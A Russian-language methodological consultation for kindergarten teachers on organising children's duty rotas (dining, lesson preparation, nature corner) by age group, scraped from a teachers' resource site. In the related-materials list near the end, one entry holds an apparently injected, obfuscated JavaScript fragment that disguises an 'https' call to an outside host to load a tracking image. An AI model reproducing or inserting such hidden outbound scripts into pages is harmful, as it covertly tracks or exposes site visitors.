Дежурство в детском саду
учебно-методический материал на тему
Дежурства - это одна из форм организации труда детей. ... Выделяют три вида дежурства: дежурство по столовой, дежурство по занятиям и дежурство по уголку природы.
Скачать:
Вложение | Размер |
---|---|
dezhurstvo_v_detskom_sadu.doc | 34.5 КБ |
Предварительный просмотр:
Воспитатель
Дронова Нина Николаевна
(составлено с учетом материалов сети «Интернет»)
Дежурство в детском саду
(консультация для воспитателей)
Дежурство предполагает выполнение ребенком работы, направленной на обслуживание группы.
На выходе (в соответствии с целевыми ориентирами ФГОС ДО):
Ребенок овладевает основными культурными способами деятельности, проявляет инициативу и самостоятельность в разных видах деятельности…
Ребенок обладает установкой положительного отношения к миру, разным видам труда, другим людям и самому себе…
ребенок…. Умеет подчиняться разным правилам и социальным нормам
У ребенка развита крупная и мелкая моторика…. Способен к волевым усилиям…
К социальным навыкам приучаем с первого дня пребывания в д/с. В яслях – обучаем навыкам самообслуживания, гигиене, опрятности
Чем старше, тем задач больше. Они есть в программе, в ФГТ – тематике недель - это раздел:…..
Чтобы дети учились трудиться – необходимо создать условия. Сегодня мы поговорим о создании условий для дежурства
Задачи дежурства:
Навыки самостоятельности, ответственности, умение организовать себя
Выполнение по образцу, стремление трудиться на пользу коллектива
Умение работать с знаково-символьной системой обозначения трудовых операций. (пояснить)
Регулярность: ежедневно, выделив время в режиме дня. (например помощь в накрывании на обед)
На выходе необходимо получить навык четко перешедший в привычку (пояснить)
Роль ребенка: помощник взрослого, его полноценный заменитель
Количество детей: пара – дежурство на группу или 1 дежурный на каждый стол.
Смена дежурных – ежедневная, 1 раз в 2 -3 дня, 1 раз в неделю
В дежурстве есть три формы объединения детей:
-это объединение в парах;
-дружеские взаимосимпатии;
-избирательные взаимоотношения.
Объединение в парах формируется для коллективной работы. Дежурные, работая вместе, обслуживают всю группу. При такой организации дети ставятся в новые условия, к ним предъявляются более сложные требования: согласовать свою работу с работой товарища. Отвечать вместе по результатам, справедливо распределять работу между собой.
по содержанию труда дежурство делится на 3 составляющие:
-дежурство в столовой;
-подготовка к занятиям;
-дежурство в уголке природы.
Содержание работы с детьми по возрастным группам:
1 млашая группа: особенности: совместно со взрослым, воспитатель обращается с просьбой помочь ему протереть стол. Рассказывает и показывает как. Дети очень любят быть значимыми. С гордостью выполняют поручения. Могут расставить салфетницы (без салфеток), хлебницы (без хлеба).
2 младшая группа:
Так же простейшие поручения, отдельные дейстия. Должны почувствовать что всякий труд связан с преодолением трудностей. Важно – работа завершалась наглядным результатом.
Со второй половины года – дежурство по столовой.: салфетницы, хлебницы, ложки, тарелки. Неделю – салф, следующ неделю – хлебницы, след – ложки и т.д. постепенно.
Не важно, что количество ложек не совпадает с количеством детей. Нельзя ругать.
Со второй младшей группы вводятся дидактические игры типа «Накроем стол для кукол», «День рождения мишки»
Средняя группа: занимает значительное место в ж гр. Основная форма – трудовые поручения. 1-3 ребенка, контролируя процесс, направляя и корректируя. Обязательно хвалить, даже если выполнил не совсем аккуратно. Хвалим при всех, ругаем наедине.. чаще даем поручения, которые другим детям не видны: сходи, принеси, попроси, узнай…
В средней группе труд – это не отдельные операции – а целый процесс, состоящий из нескольких этапов. Ребенок сервирует стол пока один, т.к. ему еще тудно согласовать свои действия со сверстником, не умеет договариваться и распределять операции между собой, убирать посуду со стола в средней группе должен взрослый, а не дежурный. Чашки дети сами относят в раковину.
Самостоятельно готовить и убирать рабочее место дети уже могут, действуя по образцу. (схема или пример, приготовленный взрослым)
Старшая группа: коллективный труд, дети сами распределяют роли-обязанности, пролумывают план работы, учатся не мешать товарищам, быть аккуратным, не стесняться, просить помощи. Внимание – на завершение дела. Есть место различным поручениям: сходи, принеси, разовые, и долговременные – эту неледю ты следишь за порядком в уголке природы….
Требования воспитателя – более высокие. Приветствуется творчество. «Сделай сам», Сделай, как у меня но подругому, сделай как хочешь.
Обязательна похвала – тимул на следующее задание, будет стараться еще лучше
Нельзя переделывать работу за ребенка взрослым на глазах этого ребенка
Помощь при подготовке к занятиям и порядку на рабочем месте.
Подготовительная группа: сегодня будем поливать цветы на участке. Подумайте как это можно сделать. Какие у вас предложения.
Вася, возьми себе помощников, сколько тебе нужно и приберитесь в песочнице младшей группы.
Каждые 3 дня можно объединять дежурных в одно звено, отвечающее за все виды дежурства. Дети самостоятельно внутри звена договорятся, кто за что будет отвечать.
Оборудование и внешний вид уголка:
Уголок дежурства
Плакат с кармашками, где есть тематическая картинка – хорошо. Кармашки заполняет воспитатель картинками детей: картинка с именем – в старших группах. У малышей – это фото ребенка или знак, который повторяется на шкафчике, полотенце, кроватке.
Форма: для накрывания столов – фартук, можно головной убор,
Для хозяйственно-бытового труда – клеенчатые фартуки.
Все висит рядом, компактно, на удобной ребенку высоте. Учатся завязывать друг другу фартуки (старшая, подг гр)
Схема накрывания – иллюстрация со средней группы (вторая половина года)
Количество схем единовременно висящих перед глазами детей – не больше трех
По теме: методические разработки, презентации и конспекты
Выступление на педагогическом совете "Организация дежурства в детском саду" 17 октября 2012 года.
В данном материале предсставлена методика организации дежурства в старшем дошкольном возрасте. К материалу прилагается презентация....
Уголок дежурства в детском саду
Красочный,удобный уголок дежурств(по столовой.природному уголку, занятиям)...
Консультация для воспитателей: Дежурство в детском саду.
Основные принципы организации дежурства и оформления уголка дежурных...
Дежурство в детском саду как средство воспитания ответственности у детей дошкольного возраста.
Консультация для педагогов....
консультация для педагогов "Организация дежурства в детском саду"
Навыки самостоятельности, ответственности, умение организовать себя- Выполнение по образцу, стремление трудиться на пользу коллектива- Регулярность: ежедневно, выделив время в режиме дня.- На выходе н...
Консультация для педагогов "Организация дежурства в детском саду"
\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!...
Листы оценивания дежурства в детском саду
Оценочные листы для дежурства детьми в детском саду. Дежурство по трем направлениям: дежурство по столовой, дежурство по занятиям, дежурство в уголке природы. Достаточно вписать имя и фамилию ребенка....